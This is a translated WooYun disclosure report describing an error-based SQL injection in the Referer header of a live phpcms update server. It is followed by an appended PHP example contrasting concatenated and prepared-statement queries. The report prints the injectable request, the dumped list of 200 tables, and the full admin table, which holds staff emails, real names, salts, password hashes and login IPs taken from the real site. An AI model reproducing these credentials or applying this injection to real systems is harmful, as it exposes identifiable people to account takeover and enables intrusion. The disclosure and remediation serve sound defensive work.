
Vulnerability summary

Defect ID: wooyun-2015-0121676

Title: MySQL error-based injection on a phpcms site

Vendor: phpcms

Author: lijiejie

Submitted: 2015-06-19 19:52

Fixed: 2015-08-08 09:22

Published: 2015-08-08 09:22

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-06-19: Details reported to the vendor, awaiting vendor action
2015-06-24: Vendor confirmed; details disclosed to the vendor only
2015-07-04: Details disclosed to core white hats and experts in the relevant field
2015-07-14: Details disclosed to regular white hats
2015-07-24: Details disclosed to intern white hats
2015-08-08: Details disclosed to the public

Brief description:

MySQL error-based injection on a phpcms site

Detailed description:

The Referer header is injectable:

GET /index.php HTTP/1.1
Referer: 123*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Cookie: PHPSESSID=qhncam3i8qper9cd21l275k017
Host: update.phpcms.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

Proof of vulnerability:

current user:    'phpcms_cn_user@%'
current database: 'phpcms_cn'
Database: phpcms_cn
[200 tables]
+--------------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_app_log_day |
| v9_app_log_total |
| v9_appcenter |
| v9_appcenter_data |
| v9_apps |
| v9_apps_content |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_buycar |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_check_email |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_relation |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_developer |
| v9_dianping |
| v9_dianping_data |
| v9_dianping_type |
| v9_down |
| v9_down_data |
| v9_downservers |
| v9_edu |
| v9_edu_data |
| v9_en_down |
| v9_en_down_data |
| v9_en_news |
| v9_en_news_data |
| v9_extend_setting |
| v9_favorite |
| v9_finance |
| v9_friend |
| v9_hits |
| v9_info |
| v9_info_data |
| v9_ipbanned |
| v9_kefu_online |
| v9_kefu_process |
| v9_key |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_license |
| v9_license_logs |
| v9_link |
| v9_linkage |
| v9_log |
| v9_loveit |
| v9_loveit_mylove |
| v9_member |
| v9_member_address |
| v9_member_detail |
| v9_member_en |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_miaosha |
| v9_miaosha_data |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_order |
| v9_order_complaint |
| v9_page |
| v9_pai |
| v9_pai_data |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_record |
| v9_pay_spend |
| v9_pl |
| v9_pl_fee |
| v9_plug |
| v9_plug_data |
| v9_plugin |
| v9_plugin_var |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201403 |
| v9_poster_201404 |
| v9_poster_201405 |
| v9_poster_201406 |
| v9_poster_201407 |
| v9_poster_201408 |
| v9_poster_201409 |
| v9_poster_201410 |
| v9_poster_201411 |
| v9_poster_201412 |
| v9_poster_201501 |
| v9_poster_201502 |
| v9_poster_201503 |
| v9_poster_201504 |
| v9_poster_201505 |
| v9_poster_201506 |
| v9_poster_space |
| v9_product |
| v9_product_data |
| v9_queue |
| v9_release_point |
| v9_score_vote |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_address |
| v9_sms_allowsend_ip |
| v9_sms_app |
| v9_sms_blacklist |
| v9_sms_check_queue |
| v9_sms_group |
| v9_sms_md5 |
| v9_sms_news |
| v9_sms_news_data |
| v9_sms_paylist |
| v9_sms_product |
| v9_sms_receive |
| v9_sms_scene |
| v9_sms_send_queue |
| v9_sms_service_queue_gid |
| v9_sms_service_report |
| v9_sms_tk |
| v9_sms_tpl |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_task |
| v9_task_quote |
| v9_task_stage |
| v9_template |
| v9_template_bak |
| v9_template_data |
| v9_times |
| v9_tuan |
| v9_type |
| v9_update_items |
| v9_update_notice |
| v9_update_referer |
| v9_update_site |
| v9_urlrule |
| v9_video_1 |
| v9_video_1_data |
| v9_visitor |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xzzd |
| v9_xzzd_data |
| v9_yp_certificate |
| v9_yp_company |
| v9_yp_design |
| v9_yp_design_data |
| v9_yp_guestbook |
| v9_yp_plug |
| v9_yp_plug_data |
| v9_yp_relation |
| v9_yp_template |
| v9_yp_template_data |
+--------------------------+


Database: phpcms_cn
Table: v9_admin
[3 entries]
+--------+--------+--------------------------------------------------+----------------------+---------+--------------+----------+----------------------------------+-----------------+---------------+
| roleid | userid | card                                             | email                | encrypt | username     | realname | password                         | lastloginip     | lastlogintime |
+--------+--------+--------------------------------------------------+----------------------+---------+--------------+----------+----------------------------------+-----------------+---------------+
| 1      | 1      | CQUHK1tTJ0NJVSArWxwDWCoBH3ItLCdLNlBQIFtYBwBfVnMC | wangdongwu@ku6.com   | z52Jxg  | phpcms       | <blank>  | 710de87fff574e2123ec793e333c1bad | 114.251.167.194 | 1302248539    |
| 1      | 102    | <blank>                                          | zhangmingxue@ku6.com | VBqZUE  | zhangmingxue | 张明雪   | 0664400c18b3fe8a28336493dc291372 | 10.228.132.12   | 1434703129    |
| 1      | 101    | <blank>                                          | mayuhui@ku6.com      | dbtrn6  | mayuhui      | 马玉辉   | 66685d46c2547db24c095798047ef375 | 10.228.132.7    | 1434699380    |
+--------+--------+--------------------------------------------------+----------------------+---------+--------------+----------+----------------------------------+-----------------+---------------+

Remediation:

Filter the input parameter before it reaches the query.
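As an added example that is not phpcms code and not part of the original report, the snippet below puts the pattern this report implies, a request header concatenated straight into an SQL string, next to the prepared-statement form that the remediation amounts to. The table name `referer_log`, its columns, the function names and the use of an in-memory SQLite database through PDO are assumptions made so that it runs stand-alone; a real application would read the value from `$_SERVER['HTTP_REFERER']` and talk to MySQL, where the same quote produces the same kind of syntax error.

```php
<?php
// Added example (not phpcms code). Table and columns are constructed for this demo.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE referer_log (id INTEGER PRIMARY KEY, referer TEXT, ts INTEGER)');

// Vulnerable pattern: the header value becomes part of the SQL text, so any quote
// in it changes the statement instead of being stored as data.
function log_referer_vulnerable(PDO $pdo, string $referer): void
{
    $sql = "INSERT INTO referer_log (referer, ts) VALUES ('" . $referer . "', " . time() . ")";
    $pdo->exec($sql);
}

// Hardened pattern: the value is bound as a parameter and is never parsed as SQL.
function log_referer_safe(PDO $pdo, string $referer): void
{
    $stmt = $pdo->prepare('INSERT INTO referer_log (referer, ts) VALUES (:referer, :ts)');
    $stmt->execute([':referer' => $referer, ':ts' => time()]);
}

// Constructed input: a Referer value that contains a single quote, the character
// that breaks the string literal in the vulnerable query.
$hostile = "123'";

try {
    log_referer_vulnerable($pdo, $hostile);
} catch (PDOException $e) {
    // The database rejects the malformed statement. Its error message is exactly the
    // channel that error-based injection reads, so this text must stay in server logs
    // and never be echoed into the HTTP response.
    error_log('vulnerable query failed: ' . $e->getMessage());
}

// The bound version stores the value verbatim, quote included.
log_referer_safe($pdo, $hostile);
$row = $pdo->query('SELECT referer FROM referer_log')->fetch(PDO::FETCH_ASSOC);
echo 'stored via prepared statement: ' . $row['referer'] . PHP_EOL;
```

Two things follow from the demo for a deployment like the one in this report: every header-derived value (Referer, User-Agent, X-Forwarded-For) deserves the same treatment as a query-string parameter, since the attacker controls all of them, and `display_errors` should be off in production so that database error text cannot be read back through the page.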

Copyright notice: please credit the source when reposting: lijiejie@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2015-06-24 09:21

Vendor reply:

Thanks

Latest status:

2015-08-03: Fixed.